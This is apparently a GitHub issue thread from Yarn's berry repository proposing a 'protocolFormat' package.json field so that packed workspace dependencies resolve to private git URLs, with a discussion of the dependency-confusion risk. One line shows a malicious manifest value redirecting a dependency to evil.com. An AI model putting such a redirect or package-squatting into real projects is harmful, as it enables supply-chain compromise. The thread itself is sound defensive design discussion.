yarnpkg / berry

📦🐈 Active development trunk for Yarn ⚒
https://yarnpkg.com
BSD 2-Clause "Simplified" License
7.27k stars 1.09k forks source link

[Feature] custom version formatting for packing sibling packages in a workspace #5495

Open appsforartists opened 1 year ago

appsforartists commented 1 year ago

Describe the user story

We don't have an internal npm server; rather, we use a git remote as our private packages host. This leads to dependencies like this:

"package-a": "git+sso://some-host/some-project.git#tag=package-a-v0.1.0-gitpkg",

In this case, some-project is a Yarn-managed monorepo containing packages like package-a and package-b. package-a depends on package-b using the workspace: protocol.

Packages are published by the excellent gitpkg, which runs yarn pack for each package and pushes the result as a git tag.

yarn pack resolves the workspace: protocol to the version in the dependency's package.json. Thus, yarn is currently assuming the packed files will be distributed with an npm server.

When someone installs a package from git and runs yarn, yarn will check if a package with that name exists on npm. If so, it will try to use it. This can yield hard to debug errors like

package-b@npm:0.0.0: No candidates found

where package-b is a transitive dependency that has been packed with the wrong version.

Describe the solution you'd like

A field in package.json that can be interpolated by the pack plugin. It might be called protocolFormat.

(There are all sorts of permutations of pack, version, dependency, protocol, remote, and format that might yield a key name. I've avoiding bikeshedding on that here.)

package.json
  "version": "0.0.0",
  "protocolFormat": "git+sso://some-host/some-project.git#tag=package-a-v$VERSION-gitpkg",

When pack encounters a manifest with this field, it uses it to replace workspace:. The value will be copied verbatim, with some simple string substitutions:

token replaced with
$VERSION package.version
$PACKAGE_NAME package.name

The most important one is $VERSION. $PACKAGE_NAME is nice because it lets the same protocolFormat be copy/pasted in many packages within a project.

Describe the drawbacks of your solution

  1. Uses a key in the package.json namespace.

    Whatever key we pick would have to only be used for this purpose. If another tool in the JS ecosystem picked a similar name for a different feature, the tools would be in conflict.

  2. Is a niche usecase in the core codebase

    Since using a git remote as a package repository is not a mainstream practice, one could argue that supporting it is outside the scope of the yarn organization.

    The footprint of this change is small (adding an if condition with a simple string replacement). It is unlikely to need much maintenance in the future.

    The assumption that anyone who uses workspace: expects their packages to be distributed to an npm server is a faulty one inconsistent with the rest of the project. If packages were only meant to be published to npm, there wouldn't be a top-level Protocols tab in the docs. This change corrects that assumption.

    Simply, its value outweighs its cost.

  3. Allows the dependency version to be changed via user input

    One can imagine an attack whereby someone adds

    "protocolFormat": "git+https://evil.com/package.git"

    to a package.json, changing how a dependent is packed.

    While supply chain attacks shouldn't be dismissed, the truth is that if someone has enough access to a codebase to change what's in a sibling package's manifest, the codebase has already been totally compromised regardless of this feature.

Describe alternatives you've considered

  1. Do nothing. Force users to use resolutions.

    The resolutions escape hatch is a workaround for this issue.

    There are two problems:

    1. Transitive dependents are responsible for resolutions. package-a can't programatically do anything to ensure that dependent-project has the correct resolutions field, but will be inevitably blamed when installation fails without one.

    2. It puts version management for private packages in a different place (resolutions) than for public ones (dependencies). It's likely that someone will forget to keep them in sync, letting one contain stale data. It's also a source for confusion.

  2. Support ${ arbitrary js expression } within the format

    Nice because it looks like a template string, but adds too much complexity.

    It's hard to format a JavaScript expression to fit in a JSON string. It also poses too many questions about which values will be in scope and how they will be sandboxed.

  3. Support any key from package.json

    One alternative to ${} would be to disallow any expression, but support any path in a package.json.

    Chosing a syntax could be difficult; anything other than ${} would need to be learned. ${} affords that it supports arbitrary whitespace and expressions, which would likely not be the case here.

    More broadly, it's unclear what keys beyond name and version might be useful. Starting with the valuable keys doesn't preclude us from adding more powerful formatting later, but does avoid yakshaving to include potentially-unneeded details in an already niche feature.

  4. A plugin

    Since pack is a plugin, its functionality could be replaced with a plugin.

    A fork is ugly. People and tools would need to know to use the fork instead of the original.

    A sandwich plugin is also an option - trying to handle workspace before pack does, and then remember to restore workspace after pack finishes.

    This solution is needlessly complex and fragile. What happens if the process is aborted before the sandwich has cleaned itself up? How do we ensure that the hooks run in the right order?

appsforartists commented 1 year ago

It's come to my attention that scanning for and squatting on private packages in public registries is being publicized as an attack called dependency confusion.

gitpkg+yarn users are particularly vulnerable due to this issue.

Imagine that again that some-project depends on package-a and package-b with git URLs, and that package-a depends on package-b via workspace:. If package-b isn't published on NPM, this works today, as the root instance of package-b fulfills package-a's import {} from 'package-b'.

However, at any point, an attacker could discover that package-b is used privately and publish an evil package-b to NPM. All of a sudden, unbeknownst to the private users, the evil clone is being downloaded alongside package-a, because there is no way for the publisher to control how workspace: schemas are resolved by yarn pack.

Would you accept a PR implementing protocolFormat (as described above) to resolve this?

arcanis commented 1 year ago

the evil clone is being downloaded alongside package-a

Why? If package-a uses workspace:, then Yarn will use whatever the project provides, and not download it from anywhere.

appsforartists commented 1 year ago

If package-a has workspace: in its package.json, yarn pack will resolve that to a specific version number and mint that number into the tarball.

Therefore:

The proposed resolution (teaching yarn pack how to write the correct version schema for private dependencies) ensures that the public package is never incorporated, even if the containing project doesn't set resolutions.